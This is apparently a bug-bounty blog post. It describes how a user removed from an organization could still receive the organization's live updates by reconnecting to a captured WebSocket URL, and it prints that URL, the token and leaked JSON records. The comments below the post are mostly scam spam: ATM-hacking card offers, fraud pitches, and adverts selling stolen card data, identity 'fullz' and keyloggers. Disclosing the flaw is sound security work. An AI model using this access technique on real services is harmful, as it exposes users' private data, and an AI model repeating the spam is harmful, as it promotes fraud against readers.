Hunting Websockets For Fun And Profit



It's been a while since we have came up with any blogpost. 
So this post will be about how i grabbed every information that was being updated over my organization even after i was removed from the organization.

First let's start with what is WebSockets?
A good explanation can be found here https://pusher.com/websockets

Lets start, As the program is private i cannot share it so i'll be naming it as victim.com and subdomain of the organization as abc.victim.com.

So while doing my normal testing i noticed that while changing any info on abc.victim.com a request is made to WebSockets with the details of the like for example in my case:

https://api.victim.com/ws?account_id=660681&access_token=1055279.rJBikWGAfRCTgrK8xhXeoF7hR5j-kB4SriC3jZOqZH_JapsE2vZ206qKVsS5qPqNntpsBh-nBCDmzQuuepCxKw

 Response for the above WebSocket connection was:

{"action":"update","acting_user_id":null,"object":{"user_connection":{"id":63184,"person_id":175308,"last_active_at":"2016-08-22T06:06:02.651Z"}}}

Apparently after watching the response i though what would happen if the user is removed from the organization would he still able to fetch the data from the organization.

Now the question was what and what not can be extracted from the WebSockets?

The first thing i noticed that the user after getting kicked from the organization is still able to extract/grab every details of changes happening in the organization by connecting to the WebSocket request which we captured earlier.

Example of the response after the user was removed from the organization.

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.603Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205693,"first_name":"owner","last_name":"owner","email":"myemailhere@gmail.com","login":"enabled","admin":true,"archived":false,"subscribed":true,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:17:20.656Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"user_connection":{"id":74022,"person_id":205693,"last_active_at":"2016-10-27T17:18:07.000Z"}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:35.489Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1000,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":2,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:11.285Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"project":{"id":799337,"name":"dada","color":"orange","code":null,"notes":null,"start_date":null,"end_date":null,"site_id":null,"archived":false,"updated_at":"2016-10-27T17:20:22.290Z","updated_by_id":202510,"client_id":398744,"tags":[],"assignment_ids":[],"milestone_ids":[]}}}

RECEIVED TEXT: {"action":"destroy","acting_user_id":202510,"object":{"person":{"id":205694,"first_name":"add","last_name":"hacker1","email":null,"login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AH.png","teams":[],"updated_at":"2016-10-27T17:18:59.499Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":1,"interval":"monthly","card":null,"address":null,"discount":null}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205695,"first_name":"aman","last_name":"dhaker","email":"testmymailforxss@gmail.com","login":"disabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:20:54.998Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"person":{"id":205695,"first_name":"owner","last_name":"owner","email":"testmymailforxss@gmail.com","login":"enabled","admin":false,"archived":false,"subscribed":false,"avatar_url":"https://secure.gravatar.com/avatar/95a2d6ba3ebdf6f5b5bb56c2306927a8.jpg?s=200\u0026d=https://victim-files.s3.amazonaws.com/default-avatars/OO.png","teams":[],"updated_at":"2016-10-27T17:21:26.586Z","updated_by_id":null,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"create","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:36.192Z"}}}

RECEIVED TEXT: {"logged_in_user_ids":["202510","205693","205695"]}

RECEIVED TEXT: {"action":"update","acting_user_id":null,"object":{"user_connection":{"id":74023,"person_id":205695,"last_active_at":"2016-10-27T17:21:57.285Z"}}}

RECEIVED TEXT: {"action":"create","acting_user_id":202510,"object":{"person":{"id":205696,"first_name":"aman","last_name":"dhaker","email":"","login":"disabled","admin":true,"archived":false,"subscribed":false,"avatar_url":"https://victim-files.s3.amazonaws.com/default-avatars/AD.png","teams":[],"updated_at":"2016-10-27T17:22:06.751Z","updated_by_id":202510,"site_user_id":null,"max_allocation_per_day":null,"assignment_ids":[]}}}

RECEIVED TEXT: {"action":"update","acting_user_id":202510,"object":{"subscription":{"next_billing_date":"2016-11-16","amount":1500,"amount_per_person":500,"receipt_recipient":null,"status":"trial","purchased_people":3,"interval":"monthly","card":null,"address":null,"discount":null}}}

I was able to extract details the user email, project details , customer details and contacts 
The good thing i noticed was that i was able to extract those details even when i was on view only permission.

Thanks For Reading.
Cheers
Bugdiscloseguys

12 comments:

  1. for this you got $1000 wow congrts leet

    ReplyDelete
    Replies
    1. I'm a professional in all kinds of hacking services, which leads me into giving out a blank ATM card to all individuals & serious minded people only. I hack, clone ATM cards worth's the total sum of $500,000.00 United States Dollars, with this card you can withdraw the sum of $3500 as daily limit till you cash out the sum total said sum & this cards has been cloned & hacked in the manner that you'll never be caught not detected during usage. For more info, kindly email us: fastatmhackers@gmail.com OR Call/WhatsApp: +16626183756



      Delete
    2. Hello everyone..Welcome to my free masterclass strategy where i teach experience and inexperience traders the secret behind a successful trade.And how to be profitable in trading I will also teach you how to make a profit of $12,000 USD weekly and how to get back all your lost funds feel free to email me on(brucedavid004@gmail.com) or whataspp number is +22999290178







































      Hello everyone..Welcome to my free masterclass strategy where i teach experience and inexperience traders the secret behind a successful trade.And how to be profitable in trading I will also teach you how to make a profit of $12,000 USD weekly and how to get back all your lost funds feel free to email me on(brucedavid004@gmail.com) or whataspp number is +22999290178


































      Hello everyone..Welcome to my free masterclass strategy where i teach experience and inexperience traders the secret behind a successful trade.And how to be profitable in trading I will also teach you how to make a profit of $12,000 USD weekly and how to get back all your lost funds feel free to email me on(brucedavid004@gmail.com) or whataspp number is +22999290178

      Delete
    3. Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download Now

      >>>>> Download Full

      Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download LINK

      >>>>> Download Now

      Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download Full

      >>>>> Download LINK FY

      Delete
    4. Hacking/Spamming/Carding/FULLZ Stuff

      Hit me up
      752822040 I-C-Q
      @killhacks Tel-Gram
      peeterhacks Skype/Wickr

      All Stuff Will Be Legit & Verified
      Tools & CC's Testing Won't Be Provided

      Hacking Tools & Tutorials with complete guide
      Spamming Stuff with Legit Tools & Leads with tutorials
      Carding Methods & Cashout process with complete details
      Key Loggers
      Smtp's/Rdp's/Shells/C-panels
      BTC Cracker/Flasher
      FB/WA Hacking Tips & Tricks
      Kali Linux Master Class Complete Updated Version
      Combos
      ----------------------------------------
      ----------------------------------------

      SSN DOB FULLZ
      SSN DOB DL FULLZ
      HIGH CS FULLZ 700+
      PREMIUM FULLZ
      CC FULLZ WITH CVV
      DUMPS WITH PIN CODES (TRACK 101-202)

      Fresh Spammed & Valid Info
      Invalid Info will be replace/No refund

      Ping me :-
      Tele-Gram > @leadsupplier
      I C Q > 7528-2204-0
      Wickr/Skype > peeterhacks
      -----------------------------------------
      -----------------------------------------

      Discounts for bulk order
      Payment mode crypto currency (BTC ETH USDT etc)
      Sampling are just for bulk orders

      THANKYOU

      Delete
  2. Hack and take money directly from any ATM Machine Vault with the use of ATM Programmed Card which runs in automatic mode. email (hydracards63@gmail.com) for how to get it and it cost,and how to also hack credit cards and send the money to your self,we are located around the world, these cards works on any ATM machine and it works according to it's activation.

    ………. EXPLANATION OF HOW THESE CARD WORKS……….

    You just slot in these card into any ATM Machine and it will automatically bring up a MENU of 1st VAULT #1,000, 2nd VAULT #5,000, RE-PROGRAMMED, EXIT, CANCEL. Just click on either of the VAULTS, and it will take you to another SUB-MENU of ALL, OTHERS, EXIT, CANCEL. Just click on others and type in the amount you wish to withdraw from the ATM and you have it cashed instantly… Done.

    ***NOTE: DON’T EVER MAKE THE MISTAKE OF CLICKING THE “ALL” OPTION. BECAUSE IT WILL TAKE OUT ALL THE AMOUNT OF THE SELECTED VAULT. To get the card email (hydracards63@gmail.com)

    ReplyDelete
  3. I DONT KNOW WHAT YOU HAVE BEEN THROUGH OR HOW LONG YOU HAVE BEEN LOOKING BUT THIS IS THE LAST STOP AS THERE IS A HACKER WHO CAN HELP YOU WITH SPY WARE ON YOUR CHEATING PARTNER OR UPGRADE YOUR SCHOOL SCORES OR HELP WITH RESULT AND CLEAR ANY CRIMINAL RECORD..

    HACKING OF FACEBOOK , EMAIL , AND BANK ACCOUNTS ARE HIS SPECIALTY.. EMAIL : GREENFR1007@GMAIL.COM OR SKYPE:SATISH.ANCHAN4

    BEST EVER

    ReplyDelete
  4. Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download Now

    >>>>> Download Full

    Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download LINK

    >>>>> Download Now

    Hunting Websockets For Fun And Profit - Yet Another Infosec Blog >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  5. Hacking/Spamming/Carding/FULLZ Stuff

    Hit me up
    752822040 I-C-Q
    @killhacks Tel-Gram
    peeterhacks Skype/Wickr

    All Stuff Will Be Legit & Verified
    Tools & CC's Testing Won't Be Provided

    Hacking Tools & Tutorials with complete guide
    Spamming Stuff with Legit Tools & Leads with tutorials
    Carding Methods & Cashout process with complete details
    Key Loggers
    Smtp's/Rdp's/Shells/C-panels
    BTC Cracker/Flasher
    FB/WA Hacking Tips & Tricks
    Kali Linux Master Class Complete Updated Version
    Combos
    ----------------------------------------
    ----------------------------------------

    SSN DOB FULLZ
    SSN DOB DL FULLZ
    HIGH CS FULLZ 700+
    PREMIUM FULLZ
    CC FULLZ WITH CVV
    DUMPS WITH PIN CODES (TRACK 101-202)

    Fresh Spammed & Valid Info
    Invalid Info will be replace/No refund

    Ping me :-
    Tele-Gram > @leadsupplier
    I C Q > 7528-2204-0
    Wickr/Skype > peeterhacks
    -----------------------------------------
    -----------------------------------------

    Discounts for bulk order
    Payment mode crypto currency (BTC ETH USDT etc)
    Sampling are just for bulk orders

    THANKYOU

    ReplyDelete
  6. I learned a lot by reading your profile. We appreciate you taking the time to provide us with such a fantastic profile. Use this tool to create false Twitter accounts and followers for other people to prank. Check out this profile to discover more about fake twitter profile generator.

    ReplyDelete

Powered by Blogger.